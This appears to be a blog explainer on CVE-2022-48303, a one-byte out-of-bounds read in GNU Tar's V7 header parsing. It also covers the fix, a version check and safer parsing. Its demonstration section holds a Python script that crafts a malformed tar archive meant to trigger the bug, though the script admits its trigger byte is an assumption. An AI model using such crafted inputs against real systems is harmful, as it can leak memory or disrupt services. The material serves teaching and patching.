GNU Tar is one of the most trusted tools in Linux for archiving and extracting files. It’s been around for decades, and is the backend for many packaging and backup systems. But in 2022, a subtle security bug—CVE-2022-48303—was discovered which could potentially affect anyone using GNU Tar up to version 1.34.

This is a hands-on, straight-talk guide to what happened, why it matters, and what you need to know.

What Is CVE-2022-48303?

Let’s break it down. CVE-2022-48303 is a one-byte out-of-bounds read in GNU Tar through version 1.34. That sounds highly technical, but it means the program can read a single byte past the data it’s supposed to look at. Worse, that byte is uninitialized memory, and Tar then uses it to decide a conditional jump, which could (in theory) make Tar behave unpredictably.

No one has demonstrated a way to make this bug do something dramatic, like run arbitrary code. Still, it’s a potential information leak, it’s a code-quality concern, and it’s an opportunity to learn from a real bug that got a CVE.

Where Did the Bug Live?

The root of the issue is in the from_header function in list.c. It only gets triggered with certain old-school tar archive formats, namely the V7 format (from Version 7 Unix!). Specifically, it trips up if an archive’s mtime (modification time) field is loaded with about 11 whitespace characters.

When Tar tries to parse the header, it expects numeric data. Too much whitespace can make Tar run past the end of its expected data, touching one extra, potentially unsafe memory byte.
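To make the "one byte too far" idea concrete, here is a toy Python model of a field scanner. It is a sketch and not tar's actual code: the function name `indices_read`, the marker values, and the decision to peek at the byte after a marker are all assumptions chosen for illustration. It only records which byte positions such a scanner would touch.

```python
# Toy model (not tar's real code): which byte positions does a scanner touch?
MTIME_OFFSET = 136  # name(100) + mode(8) + uid(8) + gid(8) + size(12)
MTIME_SIZE = 12

def indices_read(block: bytes, offset: int, size: int) -> list[int]:
    """Return every index a naive scanner would read for one header field."""
    lim = offset + size  # first index that is NOT part of the field
    pos = offset
    read = []
    # Skip leading whitespace, stopping at the first non-blank byte.
    while pos < lim:
        read.append(pos)
        if block[pos] not in b" \t\n\v\f\r":
            break
        pos += 1
    # Assumed flaw: a marker byte makes the scanner peek at the next byte
    # without first checking that the next byte is still inside the field.
    if pos < lim and block[pos] in (0x80, 0xFF):
        read.append(pos + 1)
    return read

block = bytearray(512)
block[MTIME_OFFSET:MTIME_OFFSET + MTIME_SIZE] = b" " * 11 + b"\x80"
read = indices_read(bytes(block), MTIME_OFFSET, MTIME_SIZE)
overrun = [i for i in read if i >= MTIME_OFFSET + MTIME_SIZE]
print(overrun)  # positions outside the 12-byte field
```

With eleven blanks in front, the only non-blank byte sits in the last slot of the field, so any "look at the next byte" step lands outside it.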

Getting Hands-On: The Code

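Here’s a heavily simplified illustration of the parsing step in list.c. It is cleaned up and commented for clarity; the real from_header takes more parameters and handles more encodings than plain octal:

// Simplified illustration, not the verbatim upstream 'list.c':
#include <stdlib.h>   /* strtol */
#include <time.h>     /* time_t */

static time_t
from_header (const char *where, int digs)
{
  char buf[21];
  char *p = buf;
  int i;

  // Copy up to 'digs' characters into buf, skipping blanks.
  // The caller must keep digs <= 20 so the copy and terminator fit in buf.
  for (i = 0; i < digs; i++)
    {
      if (where[i] == ' ')
        continue; // Skip whitespace
      *p++ = where[i];
    }
  *p = '\0'; // Terminate the string

  // Convert the octal digits to a number
  return strtol (buf, NULL, 8);
}

If the where buffer is all spaces, nothing is copied and buf holds only the terminator, so this simplified version stays well defined. The real function is more involved, and per the CVE description the problem there is a read one byte past the end of the field, whose uninitialized value then decides a conditional jump. Branching on an uninitialized value is undefined behavior.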

Demonstrating the Bug

So far, nobody has shown how to turn this bug into arbitrary code execution. But you could, at minimum, get Tar to read junk memory, possibly leaking a byte. In rare situations, that might cause a crash or weird program behavior.

You can trigger the bug by crafting a tar file with a V7 header where the mtime (modification time) is about 11 spaces long:

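# Build a minimal V7-style tar archive whose mtime field is mostly blanks.
def field(value: bytes, width: int) -> bytes:
    return value.ljust(width, b"\0")  # NUL-pad a field to its fixed width

header = field(b"file1.txt", 100)       # name
header += field(b"0000644", 8)          # mode
header += field(b"0000175", 8)          # uid
header += field(b"0000175", 8)          # gid
header += field(b"00000000001", 12)     # size: one byte of content
# mtime: 11 spaces. The 12th byte is an ASSUMPTION (a base-256 marker in the
# last slot); the CVE text only says "approximately 11 whitespace characters".
header += b" " * 11 + b"\x80"
header += b" " * 8                      # chksum: counted as spaces while summing
header += b"0"                          # typeflag: regular file
header = header.ljust(512, b"\0")       # linkname and the rest of the block

# Store the checksum as six octal digits, NUL, space; tar rejects a wrong one.
chksum = b"%06o\0 " % sum(header)
header = header[:148] + chksum + header[156:]

with open("badv7tar.tar", "wb") as f:
    f.write(header)
    f.write(b"a".ljust(512, b"\0"))     # file content padded to a full block
    f.write(b"\0" * 1024)               # two zero blocks mark end of archive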

Now, running tar might look like this:

tar tf badv7tar.tar

Depending on platform and build, you may get weird output or a read of an uninitialized byte, but not a “crash or hack.”
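Before handing a crafted file to tar, it can help to confirm that the header really has the layout you intended. The sketch below splits a 512-byte block into the classic fixed-width fields and checks the stored checksum. The helper names (`split_header`, `expected_checksum`, `stored_checksum`) are made up for this example, and the sample block is built in memory so the snippet runs on its own.

```python
# Field widths of the classic tar header, in order (257 bytes used, rest padding).
V7_FIELDS = [
    ("name", 100), ("mode", 8), ("uid", 8), ("gid", 8),
    ("size", 12), ("mtime", 12), ("chksum", 8),
    ("typeflag", 1), ("linkname", 100),
]
CHKSUM_START, CHKSUM_END = 148, 156

def split_header(block: bytes) -> dict[str, bytes]:
    """Slice a header block into its raw, fixed-width fields."""
    fields, offset = {}, 0
    for name, width in V7_FIELDS:
        fields[name] = block[offset:offset + width]
        offset += width
    return fields

def expected_checksum(block: bytes) -> int:
    """Sum all 512 bytes, treating the chksum field as eight spaces."""
    blanked = block[:CHKSUM_START] + b" " * 8 + block[CHKSUM_END:512]
    return sum(blanked)

def stored_checksum(block: bytes):
    """Decode the octal checksum stored in the header, or None if blank."""
    raw = block[CHKSUM_START:CHKSUM_END].strip(b" \0")
    return int(raw, 8) if raw else None

# Hypothetical sample block: a name, an all-blank mtime, and a valid checksum.
sample = bytearray(512)
sample[0:9] = b"file1.txt"
sample[136:148] = b" " * 12
sample[148:156] = b"%06o\0 " % expected_checksum(bytes(sample))
sample = bytes(sample)

fields = split_header(sample)
print(fields["mtime"])
print(stored_checksum(sample) == expected_checksum(sample))
```

To inspect a file on disk instead, read its first 512 bytes in binary mode and pass them to the same helpers.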

- CVE-2022-48303 at NVD
- GNU Tar Source Code
- Upstream Patch – How the GNU Tar maintainers fixed it

Should I Panic?

No. As of this writing, there’s no exploit in the wild, and no one has shown a way to leverage this for a real attack. But it’s still a bug. Future researchers might find new tricks, and you might as well patch.

Most distributions have already shipped fixed packages. If you’re using GNU Tar 1.35 or higher, you’re safe from this one.
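If you want to check a machine quickly, a small script can read the version banner. This is a rough sketch: it assumes the first line of `tar --version` looks like `tar (GNU tar) 1.34`, and the function names are invented for the example. Keep in mind that a distribution can backport the fix into a package that still reports 1.34, so an old version number is a prompt to check your distro’s advisory, not proof that you are vulnerable.

```python
import re
import subprocess

def parse_gnu_tar_version(version_output: str):
    """Return (major, minor) from GNU tar's version banner, or None."""
    lines = version_output.splitlines()
    first = lines[0] if lines else ""
    match = re.match(r"tar \(GNU tar\) (\d+)\.(\d+)", first)
    if match is None:
        return None  # not GNU tar, or an unexpected banner format
    return int(match.group(1)), int(match.group(2))

def is_upstream_fixed(version) -> bool:
    """True when the upstream release is 1.35 or newer."""
    return version >= (1, 35)

def installed_tar_version():
    """Ask the local 'tar' binary for its version (requires tar on PATH)."""
    result = subprocess.run(
        ["tar", "--version"], capture_output=True, text=True, check=True
    )
    return parse_gnu_tar_version(result.stdout)

# Example with a canned banner, so the snippet runs without tar installed.
sample_version = parse_gnu_tar_version("tar (GNU tar) 1.34\nCopyright ...")
print(sample_version, is_upstream_fixed(sample_version))
```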

How Was It Fixed?

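The fix is straightforward. Upstream tightened the bounds check in from_header so the decoder no longer looks at a byte beyond the end of the field.

In terms of the simplified sketch above, the comparable defensive step is to make sure the buffer is always initialized, so even a field that is all spaces never leads to an uninitialized read:

memset (buf, 0, sizeof buf); // Always zero the buffer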

This is a good habit: Always initialize buffers before you use them.

- Sloppy input handling and uninitialized variables are still common problems, even in mature code.
- For sysadmins and devs: Always keep your tools up to date, and don’t assume old formats can’t trip up modern code.
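As a small illustration of careful input handling, here is one way to parse a fixed-width octal header field defensively. This is a sketch under my own assumptions, not how tar does it: the name `parse_octal_field` is hypothetical, and unlike tar it rejects anything that isn’t plain octal rather than supporting other encodings.

```python
from typing import Optional

def parse_octal_field(field: bytes) -> Optional[int]:
    """Parse a NUL/space-padded octal field; None means the field is blank."""
    text = field.strip(b" \0")  # drop padding on both ends
    if not text:
        return None  # all blanks: report "no value" instead of guessing
    if any(byte not in b"01234567" for byte in text):
        raise ValueError(f"non-octal bytes in field: {field!r}")
    return int(text.decode("ascii"), 8)

print(parse_octal_field(b"0000644\0"))  # a typical mode field
print(parse_octal_field(b" " * 12))     # an all-blank mtime field
```

Every byte is checked before it is interpreted, and the blank case has an explicit result, so there is no path where leftover or out-of-range data influences the answer.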


If you want to dig deeper or see the patch yourself, check out the resources above.
Have more questions? Here's the official tar bug tracker.

Timeline

Published on: 01/30/2023 04:15:00 UTC
Last modified on: 03/27/2023 00:15:00 UTC